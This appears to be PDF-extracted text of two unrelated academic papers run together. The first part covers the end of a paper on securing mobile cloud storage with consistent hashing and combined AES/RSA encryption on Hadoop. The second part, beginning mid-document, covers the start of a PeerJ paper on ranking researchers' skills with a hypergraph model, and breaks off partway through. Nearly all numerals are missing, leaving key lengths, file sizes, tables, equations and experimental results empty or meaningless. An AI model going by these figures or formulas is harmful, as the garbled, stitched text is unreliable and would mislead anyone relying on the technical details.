the database server will be stored in the primary server. the ip address of the database server is retrieved and got from the primary server and then interacts with the database server. the storage processing pattern for small files is shown in figure . a mobile terminal security strategy based on the cloud storage figure. the storage processing pattern for small files the corresponding relationship is stored in the data table in the primary server, and the corresponding relationship is the file name and the server ip address. the data table is shown in table i. table data tables in the primary server field typ length note id int serial number fname varchar filename ip varchar ip address file names, file sizes, and content are stored in the database server. the file information table is shown in table . table the file information table field typ length note id int serial number fname varchar filename fsize int file size creat datetime creation time context mediumtext content . the copy strategy for large files files larger than mb are called large files. the storage group is used as a copy strategy for large files. the system architecture of the storage group is fully connected. the system architecture is shown in figure . the pc is used as a storage medium in the storage group. however, the reliability of the pc is not high, and it will even fail when the data is stored. therefore, a copy is required to ensure that the data is reliable. international journal of advanced network monitoring and controls volume , no. , figure. the system architecture diagram of the storage group in the storage group system, all information about adjacent nodes are stored in every pc. the needed storage nodes can be found quickly through querying the information stored in the nodes. the structure of storage space in the storage group is ring, and at the same time, the method of the unified addressing is adopted. in the storage group, the difference in performance of the pc can be offset by the virtual contiguous storage space. 
first, the hash algorithm message-digest algorithm is used to implement system address conversion. the actual physical address is processed and converted to - bit information string through the md algorithm, and then these information string are stored in the virtual continuous address. thus, the differences in performance between devices will be offset. the loop storage structure of the storage group is shown in figure . figure. the loop storage structure of the storage group the converted address is mapped to the virtual storage space loop of the storage group through the md algorithm. the device is found in the clockwise direction, and then the data is stored in the first pc mapped. the data is backed up to two adjacent pc. the larger the amount of data in the system, the more uniform the spatial distribution will be. the data are stored when the routing of the corresponding pc and adjacent pc are updated. the routing information table is shown in table . table routing table field typ length note id int serial number fname varchar filename fsize int file size ip varchar ip address a mobile terminal security strategy based on the cloud storage the ip address of the pc device where the file replica is located is stored in the ip field in the routing information table. the ip field is the routing information for the adjacent pc. once a node fails, all the information stored in the node are backed up and the routing information of the adjacent node is modified in time. according to the principle of the consistency hash algorithm, the storage space of the new pc device will be mapped to the new virtual address space when a new device needs to be added to the storage group. the existing space on the ring will not be changed, and this method can be very effective in avoiding the vibration of the address space. meanwhile, the routing information on the adjacent pc are updated. the process of adding a pc is as shown in figure . figure. the process of adding a pc the process of exiting the storage group is essentially the same as the process of joining. in the clockwise direction, there are three pc in the storage group, x, y, and z. if y applied to get out of the loop, the information that was stored in the y would be copied from x to z, and the information that was stored in the y would be copied from z to x, and then, the data in y-master backup is copied to the first device from z of the loop. . security design of the cloud storage cloud storage is a hot topic in industry and academia in recent years, and the security problems of the cloud storage would have been under scrutiny. the aes(advanced encryption standard) algorithm is simple and the encryption of aes is fast. however, aes has problems with key allocation and confidentiality management. there is no need for secret allocation of keys in asymmetric encryption algorithms, and at the same time the security of the keys is easier. in addition, user authentication and digital signatures can be achieved through the rsa algorithm. to make full use of the advantages of the aes and rsa algorithms, a solution that combines aes and rsa encryption algorithms for mobile terminal cloud storage security design is proposed in the paper. . encryption and decryption design for mobile terminal after the data is encrypted through aes, then the encryption key is encrypted by rsa. the encrypted key message are binded to the encrypted data. the message will then be stored in each node of the hdfs. 
this approach can improve the storage efficiency of the mobile cloud storage system and also solve the key distribution of single key cryptography. when the data on hdfs is read and downloaded, the ip address of the adjacent pc is got by broadcast the virtual address is obtained through the consistency hash algorithm update the routing table update the routing table of the adjacent pc international journal of advanced network monitoring and controls volume , no. , the aes key is extracted from the cryptograph, then the decryption is obtained through the user’s private key, finally, the document is declassified and plain text is obtained. the process is as follows. ) during data encryption uploads, users log in to the cloud storage system, sending data requests to hdfs and encrypting the transfer. at the same time, a -bit aes encryption key is generated by the client random key generator. ) on the mobile side, the data that needs to be transmitted is encrypted with the aes key, and the cipher text would be got. ) the encryption key of the file is encrypted through the -bit rsa public key, and then the key cipher is obtained. ) the key cipher are bound to the file cipher, in accordance with the file cipher, the file is stored in the hdfs file system with the corresponding tag bit and data length identification. ) when the data is downloaded from an hdfs system in the cloud, the data are decrypted and downloaded. after the data are obtained, which are transferred from the hdfs system to the mobile end. the first bit of data is judged first by the system, and if it is zero means that the data is in plain text, the data are restored after removing the tag bits. on the contrary, if it is means that the data is a cipher, it should be decrypted. ) first, extract a -byte aes key cipher from the data, aes plaintext key are got by decrypted the user’s personal rsa private key. ) the cipher part of the stored file cipher is decrypted by aes through the aes key, and then the stored file plaintext is got . the data storage format of the cloud storage system the data for the cloud storage system includes two storage formats, which are plaintext storage and crypto text storage. the storage format is shown in figure figure. the storage format of the file if the first digit in the storage format is , which means that the data is stored in plain text, on the contrary, if it is means that the data is a cipher. the bytes need to be added before the cipher text to store the aes cipher key encoded by rsa when the data is stored in cipher text. the field for the valid (b)the storage format of cipher text file key bit data length cipher byte byte (a)the storage format of the plaintext file plaintext bit a mobile terminal security strategy based on the cloud storage length of the data is bytes, and the field of cipher represents the encrypted text by aes. each -byte byte stream is encrypted with aes and is converted into a -byte cipher stream. so the length of the cipher section grows relative to the original plaintext data. . security analysis the security design of the mobile cloud storage is implemented in a combination of the aes algorithm and the rsa algorithm. the security is analyzed separately for the aes and rsa algorithms. the security of aes is analyzed through exhaustive attack, the differential attack, and interpolation attack when the aes key don’t be known. ) exhaustive attack: the average complexity of the exhaustive key is k- aes encryption, in which k is the length of the key. 
for the -bit key in this scheme, times of aes encryption are required and the calculation is very large, and obviously this method of attack is invalid. ) differential attack: the wide trajectory strategy adopted by the aes algorithm can effectively resist differential attacks. the prediction probability of the difference trajectory is between and after four rounds of transformation, it’s between and after the eight transformations. so, enough times can be identified to make all the differential trajectory less than / n- , n is the number of blocks. this makes the difference attack fail. ) interpolation attack: f domain in aes algorithm, expansion is shown as blow: + fx +b x + x +f x + x +f x + x + x because the expansion is complex, the attack is also invalid. through this analysis, the aes algorithm is better immune to known attacks the unknown aes key, from the analysis above, we can learn that the aes algorithm is better immune to known attacks in case of not knowing the aes key. also, the user’s files in hdfs are stored in a certain size, and the security of the system can be further enhanced. therefore, the main issue of security is the security of the aes file encryption key. how to manage and store file encryption keys is the key to determining the security of the solution. in the design scenario presented in this article, technology of one-timepad is used for file transfer storage. each data stored has a different aes key, and the aes key is transparent to the user. in addition, the aes key for each file is encrypted by using the rsa algorithm. the encrypted aes key is bound to the file cipher and then stored in hdfs. the user must take care of his rsa private key throughout the process. the above encryption is done on the mobile side, which implements the file’s cryptographic transfer and cryptographic storage. and then the security of rsa is analyzed in detail. the security of rsa depends on the large integer factorization. the difficulty of attacking the rsa system is the difficulty of the large integer factorization. the schroeppel algorithm is a better factorization algorithm, and which is often used to analyze the problems of the large integer factorization. the number of operations required in decomposing the factor of decimal number n with different length by using schroeppel algorithm. the number of decomposing operations is shown in table iv, in which the factor of decimal number n with different length is decomposed by using schroeppel algorithm. international journal of advanced network monitoring and controls volume , no. , table the number of operations of decomposition factor by using the schroeppel digits of decimal number n the number of operation . × . × . × . × . × the longer the length of n is, the more difficult the factorization is in the rsa algorithm. for every ten bits of binary that are added, the time of decomposition is going to be doubled. and then the harder it is to decode the password, the more the strength of the encryption will be. a key length of , , bit are often selected in rsa. in the cloud storage security technology solution designed in this paper, the -byte aes key is the object of rsa encryption, the system will be highly secure once the key of bit is selected. assuming that the reliability of the cloud storage system is a. the time of encryption through different encryption algorithms is at, the encryption time at is reversed first,and after the normalization processing,aj is got from at. 
the transfer rate of a file with the same size after the normalization processing is ak,n is the copynumber. the reliability model of the system is: ]) ( ][) ( [ nk n j aaa −−−−= ( ) it can be concluded through the analysis of the reliability model, when the value of aj and ak are more closer to , and the number of n is more larger, the cloud storage system will be more reliable and with higher security. . experiment and result analysis the hadoop cluster built in this article consists of one namenode server and three datanode servers. the client submits the data through the namenode server. the configuration of the four datanode servers is: intel dual core cpug @ mhz; network environment for netlink bcm gigabit ethernet; the version of hadoop is . . ; the version of linux is ubuntu . ; and jdk . . _ is used. the configuration of client is pentium/(r) dual-core cpu e @ . ghz. the mobile terminal is huawei y -cl , qualcomm snapdragon cpu and gb memory are used. a certain number of storage nodes are simulated by using cloudsim simulation. the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. system is tested by using a smart mobile terminal. experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. the percentage of the response time for the transaction is shown in figure . figure. the percentage of the response time for the transaction a mobile terminal security strategy based on the cloud storage through the analysis of figure , it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. the average response time of the transaction is obtained from the diagram. although one of the transaction response time is longer, but the response time for most other transactions is acceptable. when this happens, it is thought that the performance of the mobile cloud storage system is better. after the encryption and decryption mechanism is introduced in the security of the mobile cloud storage, the security of the cloud storage is improved effectively. there are two questions to be considered: the impact of encryption and decryption on file speed; the impact of encryption and decryption on the performance of the client host. in the mobile cloud storage security technology proposed in this article, the method of encrypting and decrypting the file on the mobile end is used. the length of the file will change after the file is encrypted into a cipher file. according to the analysis of the file storage format in . . the header of each cipher file needs to be added bytes to store the aes secret key. in addition, when the aes file is encrypted, each bytes text will be encrypted and then changed to bytes cipher. in conclusion, after encrypting,the length of the cipher file is about . percent more than the file. the namenode and datanode in hdfs may be caused an additional cost of about . percent after encrypting. for clientnode in hdfs, the time spent on file encryption and decryption is increased, and the performance is reduced eventually. the effect of file encryption and decryption on the whole file transfer rate is mainly in two aspects: the time required to encrypt and decrypt the transmission file by using aes; the time spent on encrypting and decrypting the aes key by using rsa. 
the experimental data are listed in table , which includes the time spent on encrypting the different sizes or different types files by using aes and the time spent on transmitting the file in hdfs. table time comparison on aes encryption and decryption file size file type aes encryption hds upload aes decryption hds download (m) (ms) (ms) (ms) (ms) . pdf . mp . mkv . doc . rmvb the time that aes key is encrypted by using rsa are also tested. by using rsa the bit aes key was encrypted for an average time of ms and decrypted for an average time of ms. it can be concluded from the above test data, the time spent on encryption or decryption by using aes is regardless of the file type. the time comparison on aes encryption and decryption is shown in figure . international journal of advanced network monitoring and controls volume , no. , figure. time comparison on aes encryption and decryption the same size files are encrypted by different aes, rsa, or rsa + aes algorithms and then the encryption time is different, as shown in table x. table time comparison for different algorithm encryption file size aes encryption rsa encryption aes+rsa encryption (m) (ms) (ms) (ms) . . . in the solution proposed in this paper, the time of aes key encrypted or decrypted by using rsa is relatively short. file transferring have little impact on total time loss and user experience. it may takes a relatively long time to encrypt files by using the aes, which cause a significant additional time overhead for hdfs. however, the encryption time that aes combined with rsa for encrypting the file was not significantly increased compared to rsa. besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. the . mb file in table vi is the test case. table and table are the test result. table the performance of the mobile end upload the data type of test utilization rate of transmission utilization rate of mobile cpu(%) rate(mbps) mobile /transmission rate raw data . . . after the encryption . . . table the performance of the mobile end download the data type of test utilization rate of transmission utilization rate of mobile cpu(%) rate(mbps) mobile /transmission rate raw data . . . after the encryption . . . a mobile terminal security strategy based on the cloud storage the ratio of cpu occupancy to upload speed is shown in table , which the data on the mobile side are tested before the encryption and after the encryption respectively. the ratio of cpu occupancy to download speed is shown in table , which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table and the table , if the encryption and decryption mechanism are used for hdfs transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see, when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. although the encryption mechanism and decryption mechanism will cause some performance loss to the mobile end, the confidentiality of the data can be guaranteed. so it is acceptable from the perspective of user data security. lots of time are spent during encryption or decryption, which can cause a drop in transmission rates. two points of improvement are proposed for this situation: ) the user can choose whether or not to encrypt the file. 
important files are usually in the form of text or images, which are generally small and can choose to be encrypted. however, some larger files, such as video, audio, etc., users can choose whether to encrypt or not. the less important files are stored in plain text, which can improve the access efficiency of the files. ) for cloud storage users, the file transfer and stored procedures are transparent. therefore, the transport encryption buffer can be set up on the client for large file transferring. after the transfer request is submitted by the user, the file’s decryption and transfer operations are implemented in the background. after the transfer is completed, only the prompt message can be given on the mobile end, which can improve the user experience. using the reliability model formula of the cloud storage system proposed in . , combine the time required for processing the same size of file in table , when a different algorithm aes, rsa, or rsa + aes is used, the encryption time required for encrypting file, after that the encryption time is reversed, aj then be got after the encryption time is normalized. in the same way, after normalizing, transfer rate ak is got. if both aj and ak are closer to , and the number of copies in the cloud storage system is larger, then the reliability of the system is higher. according to the above analysis, the data in one hour is sampled continuously, combined with the data in table and table , the reliability contrast diagram for the cloud storage system is shown in figure . figure. the reliability contrast diagram international journal of advanced network monitoring and controls volume , no. , it can be know the reliability of the system through different algorithm by comparing the data in figure . by using the rsa encryption, the system’s reliability values are almost maintained at . the reliability of the system is relatively high. that is, it has little impact on file transfer and user experience by using rsa encryption. it may takes a relatively long time to encrypt files by using the aes. and the reliability of the system is very jitter. it is shown that the system reliability is low with aes encryption. however, the encryption time that aes combined with rsa for encrypting the file was not significantly increased compared to rsa. the value of the system reliability is consistent with the use of rsa, which can be maintained around . it is concluded that the system is relatively reliable by using aes and rsa encryption. through the simulation experiment, it is verified that the mobile cloud storage system has a good user experience. it is also verified that the multi-copy mechanism of the cloud storage system can effectively improve the efficiency of the cloud storage system. when a mobile terminal makes a request, the closest copy is selected and then the time can be saved effectively. in the solution presented in this paper, the encryption and decryption performed by the mobile side has the following characteristics: transport security and storage security of the user data are guaranteed. the mobile side finish the encryption before calculating the checksum, so the encryption will not break the hdfs data integrity check mechanism. in the entire distributed file storage system, the encryption and decryption are scattered to the various mobile devices. while this will cause some performance damage to the mobile, there is no additional performance penalty for namenode and datanode. 
the solution enables the entire distributed file system to be protected by data privacy, and there is no significant performance penalty for multi-user, large access, and file access. in the current version of hdfs, the mobile user identity is given by the host operating system. the user authentication mechanism for the hdfs mobile is also very flawed. in the scheme proposed in this paper, the rsa algorithm and its public key library are introduced, which can create the prerequisite for solving the kind of problem. . conclusion cloud storage security technologies for mobile terminals proposed in this paper, different storage policies are used for file in different size. considering the storage efficiency of mobile, the load balancing effect of cloud storage system is improved, and the stability and extensibility of cloud storage system is improved. in addition, in order to make the cloud storage system has higher reliability. according to the characteristics of hdfs data input output and integrity checking, the aes algorithm is used to encrypt the files uploaded by the user on the client side of hdfs. this ensures that the confidentiality of mobile user data in the cloud storage system. by using the rsa algorithm, the security of the aes key is guaranteed, and the issue of distribution and management of the aes single key password can be resolved. the two storage formats of the cloud file are designed to implement the user’s own choice, reduce the number of copies, and ultimately improve the storage efficiency of the mobile cloud storage system. finally, the reliability of the mobile cloud storage security technology scheme is verified through a series of simulation experiments. the mobile cloud storage security technology scheme proposed in this paper has better security and reliability. but there are still many problems that have not been solved, and further research is needed. a mobile terminal security strategy based on the cloud storage in order to improve the user experience by setting up the encryption buffer. at the same time, pki technology can be used to implement ca authentication and digital signatures for hdfs users to further enhance hdfs security. foundation item the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ) references [ ] idziorek j, tannian m, jacobson d. attribution of fraudulent resource consumption in the cloud [j]. ieee fifth international conference on cloud computing, : - . [ ] tsai t, theera -ampornpunt n, bagchi s. a study of soft error consequences in hard disk drives [j].ieee/ifip international conference on dependable systems and networks (dsn ), : - . [ ] schmuck f b, haskin r l.gpfs: a shared-disk file system for large computing clusters[c]//proceedings of the conference on file and storage technologies, january - , : - . [ ] namjoshi j, gupte a. service oriented architecture for cloud based travel reservation software as a service[c]// proceedingsof the ieee international conference on cloud computing(cloud’ ), bangalore, india, sep - , .los alamitos, ca, usa: ieee computer society, : - . [ ] goth g. virtualization: old technology offers huge new potential [j].ieee distributed systems online, , ( ). [ ] bowers k d, juels a, oprea a. proofs of retrievability : theory and implementation [j]. proceedings of the acm workshop on cloud computing security (ccsw′ ), : . [ ] armbrust m, stoica i, zaharia m, et al. a view of cloud computing [c]. communications of the acm , , ( ): . [ ] mell p, grance t. 
nist special publication - :the nist definition of cloud computing [j]. national institute of standards and technology, . [ ] karame g o, capkun s, maurer u. privacy -preserving outsourcing of brute-force key searches[j]. proceedings of the rd acm workshop on cloud computing security workshop (ccsw′ ): : . [ ] schiffman j, moyer t, vijayakumar h, et al. seeding clouds with trust anchors [j]. proceedings of the acm workshop on cloud computing security workshop (ccsw′ ), : submitted november accepted february published march corresponding author xiaomei bai, xiaomeibai@outlook.com academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright kong et al. distributed under creative commons cc-by . open access skill ranking of researchers via hypergraph xiangjie kong , lei liu , shuo yu , andong yang , xiaomei bai and bo xu key laboratory for ubiquitous network and service software of liaoning province, school of software, dalian university of technology, dalian, china anshan normal university, computing center, anshan, china abstract researchers use various skills in their works, such as writing, data analysis and experiments design. these research skills have greatly influenced the quality of their research outputs, as well as their scientific impact. although many indicators have been proposed to quantify the impact of researchers, studies of evaluating their scientific research skills are very rare. in this paper, we analyze the factors affecting researchers’ skill ranking and propose a new model based on hypergraph theory to evaluate the scientific research skills. to validate our skill ranking model, we perform experiments on the plos one dataset and compare the rank of researchers’ skills with their papers’ citation counts and h-index. finally, we analyze the patterns about how researchers’ skill ranking increased over time. our studies also show the change patterns of researchers between different skills. subjects algorithms and analysis of algorithms, computer architecture, social computing keywords hypergraph model, skill ranking, researcher evaluation introduction the burst of development in science contributes to an expansion of knowledge and technology. it also leads to many new disciplines and interdisciplines emerging in universities (lee, xia & roos, ). scientific cross-disciplinary collaboration brings positive effects to improve the productivity and quality of researchers’ outputs. collaboration has become a common phenomenon in people’s daily life for a long time. more and more works are finished with the form of collaboration, such as project and assignment, patent, software development and scientific papers. the patterns of collaboration and teamwork have attracted the interest of researchers in many disciplines (kong et al., ). organizations like funding agencies, universities, enterprises, etc. are also concerned about team-based issues to improve the productivity and boost the profits. many state-of-art works have been proposed to analyze the pattern of collaboration and optimize the team structure. many efforts have been made to analyze and optimize teams in terms of their topology structure (milojević, ; kong et al., ; wang et al., ), which have made great contributions. however, team effectiveness not only depends on the appropriate team topology structure, but also depends on their function component, such as the abilities and skill distributions of team members (li et al., ). 
some works built, evaluated and refined teams in consideration of both skills of team members and the team topology structure (li et al., ; wang, zhao & ng, ). how to cite this article kong x, liu l, yu s, yang a, bai x, xu b. . skill ranking of researchers via hypergraph. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:xiaomeibai@outlook.com mailto:xiaomeibai@outlook.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. quantifying individual’s ability and impact is a key point for solving the problems of team building, evaluation and refinement. it is also needed in many other practical applications; for example, awards granting, score assessment and scholarship awarding. however, how to evaluate a researcher’s ability with limited resources in the diverse academic circumstance is still under exploration. under the scenario of big scholarly data, a large number of data-driven indices and measures were proposed to evaluate the impact of researchers reliably (xia et al., ). in the early years, h-index (hirsch, ) was proposed to evaluate both the publication quantity and quality of researchers based on the number of papers and the citations of the highly cited paper. a researcher with an index h means that he/she has h published papers and each of them has been cited at least h times. the index has been proved to be a simple but valid measure in evaluating scholars’ scientific impact (bornmann & daniel, ). the h-index has become a frequently used index and has been applied to solve many problems by scholars. besides, many other indices are proposed to evaluate the performance and impact of researchers, such as g-index (egghe, ), s-index (sawilowsky, ) and aif (pan & fortunato, ). another frequently used measure is q parameter (sinatra et al., ), which is a unique parameter to capture the ability and evaluate the impact of a scientist. in recent works, methods of ranking authors in a heterogeneous network have been proposed (meng & kennedy, ; liu et al., ), in which multi-types of vertices and relationships are taken into consideration. however, these measures are proposed to evaluate researchers’ abilities and impact on the macro level. they cannot reflect a researcher’s proficiency with a particular skill. using these measures to solve some practical problems may influence the accuracy of the results. researchers’ skill sets have been used in solving many problems, such as team formation, team member replacement and team refinement (kong et al., ). many researchers use terms extracted from the paper’s keywords and title or conference and journal name as authors’ skills (li et al., ). they only consider a binary relationship between researchers and skills, that is, whether a researcher has a particular skill. however, in real-life practice, the relationship between researcher and skill is more complicated. the skillfulness of an expert should be taken into consideration according to his previous experience. farhadi et al. ( ) proposed a skill grading method in team formation problem. they proposed a complex formula based on the similarity between scholars and their possessed skills to calculate the skillfulness level. 
many works used authors’ contribution information to measure their impact and analyzed collaboration patterns of authors (persson, ; paul-hus et al., ; rahman et al., ; corrêa jr. et al., ; biswal, ). the contribution information can also be used in credit allocation and ranking authors (sekercioglu, ; dance, ). the contributions are mainly extracted from acknowledgements of papers, or contribution information in journals like plos journals, the british medical journal and the febs journal. other skill evaluation methods are proposed for measuring workers’ skills, where the skills are extracted from job seekers’ resumes in the online job market (zhou et al., ; anderson, ) and online social platform (alvarez-rodríguez & colomo-palacios, ). for example, in economic issues, skills are extracted for analyzing the relationship between skill and wage (anderson, ) kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and reducing the skills gap (zhou et al., ). however, these methods are mainly proposed to solve problems in labor economics, but cannot be used to evaluate the skills for students and researchers. despite their success in evaluating a researcher’s impact and ability to some extent, a fine-grained method that quantifies researchers’ skill level is still needed now. in this paper, we analyze the factors affecting scientific skill ranking, and construct a heterogeneous network for mapping them into a hypergraph. we present measures to calculate the weights of the edges in the heterogeneous network. the degree of skillfulness for a researcher is denoted as the weight of the hyperedge, which is calculated by a method inspired from the laplace kernel function. our contributions are summarized as follows: • model establishment. we carry out data and empirical analysis on the features that influence the proficiency of researchers’ skills, and then we establish a skill ranking model (srmodel) to evaluate the skillfulness of researchers via hypergraph. • dataset construction. we construct a dataset by crawling information from plos one journal website, including , papers authored by , researchers with kinds of skills aggregated by contributions. • skill ranking analysis. we perform our model on the plos one journal dataset to validate the effectiveness of the model and the pattern of how scholars’ skill ranking increased over time. background facing the highly competitive academic society, researchers have to master a wider variety of skills and knowledge to improve personal strength. besides, the discipline integration and the researcher’s skill migration have become a trend in academia with the rapid development of science and technology. it is a great challenge to rank skills of researchers under such complex conditions. in this part, we aim at figuring out what influence the researchers’ skill ranking according to data analysis and empirical analysis. we use data collected from the plos one journal website to make an investigation and carry out our analysis. the plos one dataset contains over , articles collected from the journal website. these papers’ publication years range from to june . the dataset includes paper title, publish year, authors, number of citations, disciplines and more specifically, authors’ contributions. more details will be introduced in the ‘experiment setting’ section. 
science and technology are playing important roles in promoting the growth of productivity owing to the unprecedented achievement the researchers have made recently. this development tendency also leads to a burst of complex tasks that need to be solved by working together among experts in different fields. the disciplinary collaboration has reduced the boundaries between disciplines and resulted in a sharp emergence of many marginal disciplines. it is clear that collaboration cross discipline becomes a trend and this will be more frequent in the future. take plos one journal, for example; we extracted the disciplines of the plos one paper on their website, and the statistics of those , papers are shown in fig. . there are only , papers in a single field, and a large number of papers cross – fields. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the distribution of number of fields for all the papers. full-size doi: . /peerjcs. /fig- it has been found that collaborations cross disciplines have brought many competitive and high-quality outputs (yegros-yegros, rafols & d’este, ; nicolini, mengis & swan, ). first, the development of the collaborative relationships between multi-disciplines makes researchers realize the advantages of resource sharing, which can make a better data and knowledge utilization either within a team or in the whole society. the efficiency and outputs of the team are also improved under the cross-disciplinary scenario. second, cross-disciplinary collaboration can bring creative ideas to researchers and produce more novel outputs for teams. researchers from different fields get strong support from other disciplines during collaboration and discussion. they are more likely to discover valuable problems and create significant innovations because they have less limitation than those who collaborate with researchers in the same field. as cross-disciplinary cooperation has become a trend in academia, discipline is one of the most important factors when considering team-related problems. researchers can learn and use skills of several disciplines in a cross-disciplinary work, which involves knowledge of more than one discipline. however, scientific research varies in different fields, and skills required by each field are diverse. one kind of skill can be different in different fields or disciplines. for example, the skill ‘‘experiment’’ in computer science is totally different from that in biology and chemistry, while another skill ‘‘paper writing’’ is more similar between various disciplines or fields. thus, the skill in different fields has both common features and uniqueness. the diversity of fields and disciplines should be taken into consideration while evaluating researchers’ skills. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. after taking discipline as an important factor in skill ranking problem, we have two questions: (i) in what aspects it may influence the skill ranking and (ii) how can we quantify a skill’s ranking? firstly, we consider the importance of a skill in a field, which indicates the relevance of skills in each field. as discussed above, the significance of the same skill in different fields varies, which is caused by discipline diversity and speciality. here we suppose that the more frequently a skill is used in a field, the more important it is in that field. 
thus, we use the rank of times that a skill has been used in a field to quantify its importance in that field. secondly, a researcher always masters multiple skills, and the proficiency of each skill is not equal as well. as a common sense, the more frequently people use a skill, the more proficient they are in it, that is ‘‘skill comes from practice’’. this indicates that the times a researcher use a skill in works are correlated to the skill’s ranking. similarly, we use the rank of times that researchers use a given skill in their works to denote skill’s importance to researchers. besides, the familiarity of researchers with a certain research field is also vital for ranking skills of researchers in different fields. this feature is quantified by the rank of number of papers that a researcher published in a given field. the more papers a researcher has published in a field, the more familiar he/she is with that field. thus, they can perform better and show a higher skill proficiency more easily. according to the above analysis, in order to rank researchers’ skill, field information needs to be taken into consideration. importance of a skill in a field, a researcher’s proficiency of each skill, and the familiarity of a researcher in a field can influence the ranking level of a skill. considering those factors, we propose a novel model to rank researchers’ skill. model this section describes the definition of skill ranking and the concept of hypergraph. we describe our skill ranking model (srmodel) based on the hypergraph in detail. problem definition we define the skill ranking problem as follow: given a complex network h = (v,e,w), where v denotes the vertices, including researchers, fields and skills in our model, e denotes different types of edges, and w denotes weight of the edges. skills indicate the ability a researcher got when he/she took part in some real works. skill ranking problem is to evaluate a researcher’s specific skill in a specific field by ranking methods. it is unconvincing to consider only the pairwise relationship between the researcher and the skill in skill ranking problem. it would be more convincing to take account of three factors. these three factors can be integrated into three kinds of relationships, including relationships between researchers and skills, researchers and fields, fields and skills. in this paper, we use the hypergraph to represent a high order relationship, which is a generation of simple network. a hypergraph can be used to represent the relationships and interactions of two or more nodes. for example, in the citation network, a paper and its reference papers can compose a hyperedge. in music recommendation problem (theodoridis, kotropoulos & kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. panagakis, ; bu et al., ), a user and the music he/she listened along with the music lists compose a hyperedge. similar problems, such as movie recommendation, interest recommendation (yao et al., ), news recommendation (liu & dolan, ; li & li, ), image retrieval (huang et al., ; yu, tao & wang, ), user rating (suo et al., ), scientific ranking (liang & jiang, ), can be solved based on the hypergraph framework. experiments show hypergraph methods are powerful and efficient to model multi-relationship systems. in a hypergraph, an edge, called hyperedge, contains arbitrary number of nodes, rather than pair of nodes in ordinary graphs (huang et al., ). 
a hypergraph is a group of h =(x,e) where x is a set of vertices and hyperedge e is a set of non-empty subsets of x. in our study, node set x is consisted of researcher set r, field set f and skill set s. each hyperedge includes a researcher, a field and a skill, denoting the ternary relation among them. srmodel our srmodel aims at ranking individual’s different skills using hypergraph model. we consider three kinds of objects and their relations in the model. the objects include researchers, fields and skills, forming the vertex set of the heterogeneous network. in this network, there are three-ary relations between skills, researchers and fields so that normal network structure cannot provide effective representation of this system. in this paper, we use a hypergraph to model the three-ary relations. to construct the hypergraph model, we build a weighted heterogeneous network to calculate the weights of edges first, denoted as h =(v,e,w), where v =r∪f∪s denotes the set of vertices and e ={e|(vi,vj),i = j} denotes the edge set. a simple example of a part of our heterogeneous network is showed in fig. a. vertex set includes three kinds of vertices, i.e., researcher vr, field vf and skill vs. edge set e includes three kinds of edges, i.e., edges between researchers and fields, researchers and skills, fields and skills. to understand the network clearly, the heterogeneous network can be regarded as a ‘‘tripartite network’’, whose vertices can be divided into three independent and unconnected node sets r, f and s. and each edge e(i,j) in network connects vertices i and j in different node sets. there are three types of edges indicating pairwise relationship between different types of nodes. to quantify the importance of the pairwise relationship, we set each kind of edge a weight to express the importance of a node to the other, which is calculated by the ranking of node’s attribute among the others in the same set. one of the three types of edges is e(vsj ,v f i ) between field i and skill j. the weight between a skill and a field is calculated by the percentile ranking of the skill in the field: w (v s j ,v f i )= −γ sf ji /l sf i , ( ) where γ sfji denotes the ranking of the skill j that used in field i, which is calculated by ranking skills according to the times they are used in a field. lsfi is the number of skills that used in the field i. we use the percentile ranking as the normalization to eliminate the influence of different number of skills in different fields. besides, we subtract from γ sfji to make the minimum weight not equal to zero. for example, suppose there are four skills in kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. skill ii skill j field a field bfield c skill i skill j field a field bfield c ba figure example of our model. (a) a simple example of a heterogeneous network containing six ver- tices and hybrid edges. (b) an example of our srmodel, which is built based on the hyperedges. for the relationships between researcher, field and skill, a hyperedge exists only if the researcher process the skill in this field. full-size doi: . /peerjcs. /fig- a field and their ranks are , , and . the weights between those four skills and this field are . , . , . and . , respectively. 
weight of edge e(vrk,v f i ) between researcher k and field i can be regarded as the importance of the researcher in the field, which is calculated by: w (v r k,v f i )= − √ (γ rfki − )/l rf i , ( ) where γ rfki denotes the ranking of researcher k in field i, which is calculated by ranking researchers according to the numbers of previous works that they have participated in a field. lrfi is the total number of researchers in field i. researchers get experience and knowledge of a field when they take part in works in this field. the more works they have done, the more they learned. we perform normalization by using the percentile ranking to eliminate the influence of different number of researchers in different fields, like in eq. ( ). there are differences between eqs. ( ) and ( ) because we use the square root to re-scale the weight in eq. ( ). the re-scaling operation is to make the distribution of the weight wider because there are many researchers rank in the tail (a large number of beginners). for example, suppose a field m has five experts, and they have published , , , , papers in this field respectively. thus, the weights between those five experts and field m are . , . , . , . , . , respectively. similarly, weight of edge e(vrk,v s j ) between researcher k and skill j represents how important a researcher is in a given skill, computed by: w (v r k,v s j )= − √ (γ rskj − )/l rs j , ( ) where γ rskj denotes the ranking of researcher k with skill j, which is calculated by ranking researchers according to the times they used this skill in their previous works. lrsj denotes the number of researchers with skill j. a hypergraph hh =(x,eh,wh) is built after constructing the heterogeneous network and calculating the weights of edges. a hypergraph built on the heterogeneous network kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 